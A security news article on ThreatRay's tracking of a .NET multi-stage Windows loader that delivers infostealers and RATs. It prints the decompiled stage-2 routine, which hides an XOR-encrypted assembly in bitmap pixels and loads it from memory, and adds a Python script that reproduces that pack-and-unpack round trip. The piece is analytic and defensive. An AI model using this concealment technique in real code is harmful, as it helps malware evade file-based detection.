New .NET Multi-stage Loader Attacking Windows Systems to Deploy Malicious Payloads

A sophisticated .NET multi-stage malware loader has been active on Windows systems since early 2022, using a three-stage deployment mechanism to distribute dangerous payloads such as information stealers and remote access trojans. The loader hides malicious code in encrypted components and bitmap resources and keeps evolving to evade detection. Researchers traced roughly 20,000 samples through code reuse analysis, revealing the stable code structure of its third stage and its role in spreading commodity malware. 2025-5-15 17:5:39 Author: cybersecuritynews.com (view original)

A sophisticated .NET multi-stage malware loader has been actively targeting Windows systems since early 2022, serving as a distribution channel for dangerous payloads including information stealers and remote access trojans.

This loader employs a complex three-stage deployment mechanism that helps it evade detection while delivering malicious software to compromised machines.

The threat has been continuously evolving, with recent versions implementing more advanced obfuscation techniques to hide their activities from security solutions.


The malware begins its infection chain with a seemingly innocuous .NET executable that contains encrypted components of subsequent stages.

Loader stages (Source – ThreatRay)

While earlier variants embedded the second stage as hardcoded strings, newer versions have adopted more sophisticated concealment methods, hiding malicious code within bitmap resources to avoid triggering security alerts.

This change shows that the operators actively maintain the loader against current detection methods rather than leaving it static.

ThreatRay researchers identified this loader through code reuse analysis, establishing connections between approximately 20,000 samples collected over a three-year period.

Their tracking revealed that despite frequent changes to the first two stages, the third stage maintains a relatively stable code structure, providing a consistent signature for detection.

The research team noted that the primary value of monitoring this loader lies in obtaining fresh samples and indicators of compromise rather than early detection of new malware families.

The loader predominantly distributes commodity threats, chiefly AgentTesla, Formbook, Remcos, and 404Keylogger.

Statistical analysis covering March 2022 through February 2025 shows consistent deployment patterns for these payloads, highlighting the loader’s reliability as a malware delivery mechanism for cybercriminals.

Multiple Stages

The loader’s technical sophistication is most evident in its staged execution process. The initial .NET executable extracts and decrypts embedded data before executing the second stage in memory.

This second stage, a .NET DLL, takes three parameters: an encoded resource name, an encoded XOR key and the name of the first-stage module. It decodes the first two at runtime, uses them to locate the bitmap resource inside the first stage, converts the bitmap's pixel data to a byte array, XOR-decrypts that array into a .NET assembly and loads it from memory, then invokes a method on the loaded assembly. The decompiled routine, with descriptive names for its helpers, is shown below:

using System;
using System.Drawing;      // Bitmap
using System.Reflection;   // Assembly

// Stage-2 entry point as decompiled. The MainForm.* helpers are the loader's own
// routines shown under descriptive names; the loops_* and sleep calls are junk
// work and delays that pad the control flow before and between the real steps.
public static void main(string ResourceName, string XORKey, string ModuleName)
{
    MainForm.loops_1(); // loops and arithmetic operations
    MainForm.sleep(); // sleeps several seconds
    ResourceName = MainForm.decode_string(ResourceName); // resource name arrives encoded
    MainForm.loops_2(); // loops and arithmetic operations
    XORKey = MainForm.decode_string(XORKey);             // so does the XOR key
    Bitmap bitmap = MainForm.get_resource(ResourceName, ModuleName); // bitmap resource in the first-stage module
    MainForm.loops_1(); // loops and arithmetic operations
    byte[] array = MainForm.convert_bitmap_to_array(bitmap); // pixel data -> raw bytes
    array = MainForm.decrypt_array(array, XORKey);           // XOR-decrypt into a .NET assembly image
    Assembly assembly = MainForm.assembly_load(array);       // load from memory; nothing is written to disk
    MainForm.get_type_20_method_29_and_invoke(assembly);     // hand control to stage 3
    MainForm.loops_2(); // loops and arithmetic operations
    MainForm.exit();
}

The third stage then deploys the final payload in memory, completing the infection chain.

Because every stage after the first runs from memory, the only artifact on disk is the first-stage executable, whose bitmap resource and encoded strings carry nothing that resembles the final payload; that is what keeps the chain quiet against file-based scanning.
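To make the stage-2 unpacking step concrete, here is an added example written for this page (it is not code from ThreatRay or from the loader) that rebuilds the round trip offline: a constructed stand-in for a stage-3 assembly is XOR-encrypted, packed as the pixel data of a 32-bpp bitmap, and then recovered in the same order the decompiled routine uses: bitmap to byte array, XOR-decrypt, and a check that the result is a PE image before anything would be handed to a loader. The pixel layout (top-down 32-bpp rows with the bytes taken in file order), the repeating-key XOR, the key value and the payload bytes are all assumptions; the article does not say how the real loader walks the bitmap or schedules the key.

```python
"""Added example (not ThreatRay's or the loader's code): reproduce the
stage-2 bitmap -> bytes -> XOR-decrypt -> assembly step offline.
The BMP layout, the repeating-key XOR and the key are constructed
assumptions; the article does not specify the real pixel order or key schedule.
"""
import struct

XOR_KEY = b"k3y!"  # constructed sample key (assumption, not from the loader)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so one routine encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_bmp(pixels: bytes, width: int) -> bytes:
    """Wrap raw 32-bpp pixel bytes in a minimal Windows BMP container.

    A negative biHeight declares top-down rows, so the pixel bytes in the file
    are in exactly the order we wrote them (no bottom-up row flip to undo).
    """
    if len(pixels) % (4 * width):
        raise ValueError("pixel buffer must be a whole number of 32-bpp rows")
    height = len(pixels) // (4 * width)
    file_header = struct.pack("<2sIHHI", b"BM", 54 + len(pixels), 0, 0, 54)
    info_header = struct.pack("<IiiHHIIiiII", 40, width, -height, 1, 32,
                              0, len(pixels), 2835, 2835, 0, 0)
    return file_header + info_header + pixels


def bitmap_to_array(bmp: bytes) -> bytes:
    """Analyst-side equivalent of convert_bitmap_to_array: pull the pixel
    bytes back out of the container using the header's data offset."""
    magic, _size, _r1, _r2, data_off = struct.unpack_from("<2sIHHI", bmp, 0)
    if magic != b"BM":
        raise ValueError("not a BMP")
    bpp = struct.unpack_from("<H", bmp, 28)[0]  # biBitCount
    if bpp != 32:
        raise ValueError(f"expected 32-bpp pixels, got {bpp}")
    return bmp[data_off:]


def looks_like_pe(blob: bytes) -> bool:
    """Sanity check before treating a decrypted blob as a .NET assembly:
    MZ magic plus a PE signature at e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def unpack_stage(bmp: bytes, key: bytes) -> bytes:
    """Bitmap -> pixel bytes -> XOR-decrypt, the order the stage-2 main() uses.
    Fails loudly when the result is not a PE image (wrong key, resource or layout)."""
    decrypted = xor_bytes(bitmap_to_array(bmp), key)
    if not looks_like_pe(decrypted):
        raise ValueError("decrypted blob is not a PE image; check key or pixel order")
    return decrypted


def make_fake_pe(body: bytes) -> bytes:
    """Constructed stand-in for a stage-3 assembly: a DOS header whose
    e_lfanew points at a PE signature. Not a loadable image."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\0\0" + body


def demo() -> bytes:
    """Pack a constructed payload the way the loader does, then unpack it."""
    payload = make_fake_pe(b"stage3-constructed-sample")
    width = 8
    pad = (-len(payload)) % (4 * width)          # fill out the last pixel row
    pixels = xor_bytes(payload + b"\0" * pad, XOR_KEY)
    bmp = build_bmp(pixels, width)               # this is what sits in the resource
    recovered = unpack_stage(bmp, XOR_KEY)       # what stage 2 feeds to Assembly.Load
    assert recovered.startswith(payload)
    return recovered


if __name__ == "__main__":
    blob = demo()
    print(f"recovered {len(blob)} bytes, PE header present: {looks_like_pe(blob)}")
```

The PE check is the part worth keeping in analyst tooling: when decryption with a candidate key yields no MZ/PE header, the key, the resource or the pixel order is wrong, and the function refuses instead of passing garbage on to the next step.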



Source article: https://cybersecuritynews.com/new-net-multi-stage-loader-attacking-windows-systems/